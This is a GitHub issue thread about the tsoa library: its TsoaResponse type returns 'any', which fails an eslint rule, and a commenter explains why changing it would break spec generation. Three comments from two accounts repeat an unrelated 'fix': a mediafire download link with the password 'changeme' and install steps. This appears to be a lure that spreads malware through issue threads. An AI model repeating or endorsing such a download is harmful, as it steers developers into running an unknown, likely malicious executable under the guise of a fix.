### ISSUE TITLE
`TsoaResponse` Generic Should Specify `BodyType` as return value, not `any`

### ISSUE THREAD

**Issue by blipk** [lukeautry/tsoa#1665]
## Sorting

- **I'm submitting a ...**

  - [X] bug report
  - [ ] feature request
  - [ ] support request

- I confirm that I
  - [X] used the [search](https://github.com/lukeautry/tsoa/search?type=Issues) to make sure that a similar issue hasn't already been submit

## Current And Expected Behavior

Following the getting started guide on error handling via this page: https://tsoa-community.github.io/docs/error-handling.html

The typing for TsoaReponse should not return `any` as it fails this eslint rule: 
```Unsafe return of a value of type `any`.eslint[@typescript-eslint/no-unsafe-return](https://typescript-eslint.io/rules/no-unsafe-return)```

This is the code I'm testing with the errored line commented:
```ts
import { Get, Route, Tags, Post, Body, Path, Response, SuccessResponse, Controller, Res, TsoaResponse } from "tsoa"
import { User } from "../data/models/models.ts"

// https://tsoa-community.github.io/docs/error-handling.html

interface ValidateErrorJSON {
    message: "Validation failed";
    details: Record<string, unknown>;
}

interface NotFoundResponseBody {
    message: string
}

@Route( "users" )
@Tags( "User" )
export class UserController extends Controller {

    @SuccessResponse( "200", "Found" )
    @Get( "{userId}" )
    public async getUser(
        @Path() userId: number,
        @Res() notFoundResponse: TsoaResponse<404, NotFoundResponseBody>
    ): Promise<User | NotFoundResponseBody> {
        console.log( "looking for users...." )
        this.setStatus( 200 )
        const sqUser = await User.findByPk( userId )
        if ( !sqUser )
            return notFoundResponse( 404, { message: "User not found" } ) // This is a type error [@typescript-eslint/no-unsafe-return](https://typescript-eslint.io/rules/no-unsafe-return)
        return sqUser
    }

    @Response<ValidateErrorJSON>( 422, "Validation Failed" )
    @SuccessResponse( "201", "Created" )
    @Post()
    public async createUser( @Body() user: { name: string; email: string } ): Promise<User> {
        this.setStatus( 201 )
        return User.create( user )
    }
}
```
To prevent the error I have to coerce the `notFoundReponse` call like below:
`return notFoundResponse( 404, { message: "User not found" } )  as NotFoundResponseBody`

## Possible Solution

Change the current typing to return `BodyType` instead of `any` - like this:
`export type TsoaResponse<T extends HttpStatusCodeLiteral, BodyType, HeaderType extends IsValidHeader<HeaderType> = {}> = (status: T, data: BodyType, headers?: HeaderType) => BodyType;`

## Context (Environment)

Version of the library:

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jackey8616** [comment]
Simply change the definition of TsoaResponse's return may broke the spec generator logics,
since the return type is concrete, the TypeResolver may give spec generator wrong type mixed w/ TsoaResponse's BodyType.

This requires changes on SuccessResponse, Response, and TsoaResponse.
